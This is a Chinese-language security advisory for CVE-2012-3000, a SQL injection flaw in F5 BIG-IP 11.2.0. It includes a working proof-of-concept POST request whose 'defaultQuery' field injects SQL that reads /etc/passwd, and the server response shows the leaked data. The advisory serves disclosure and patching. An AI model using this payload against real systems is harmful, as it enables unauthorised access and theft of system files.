F5 BIG-IP SQL注入漏洞
发布日期:2013-01-22
更新日期:2013-01-23
受影响系统:F5 BigIP 11.2.0
描述:
BUGTRAQ ID:
57500
CVE(CAN) ID:
CVE-2012-3000
F5 BIG-IP产品可为企业提供集成的应用交付服务,如加速、安全、访问控制与高可用性。
F5 BIG-IP 11.2.0之前版本没有有效过滤用户输入,在实现上存在SQL注入漏洞,成功利用后可允许攻击者破坏应用、执行未授权操作。
<*来源:S. Viehböck
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
POST /sam/admin/reports/php/saveSettings.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 119
{
"id": 2,
"defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),0,60)) --
x" }
Note: target fields are only VARCHAR(60) thus MID() is used for extracting
data.
A request to /sam/admin/reports/php/getSettings.php returns the data:
HTTP/1.1 200 OK
...
{success:true,totalCount:1,rows:[{"id":"2","user":"admin","defaultQuery":"XX","ext1":"root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nol","ext2":""}]}
建议:
厂商补丁:
F5
--
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.f5.com/bigip浏览次数:4111
严重程度:0(网友投票)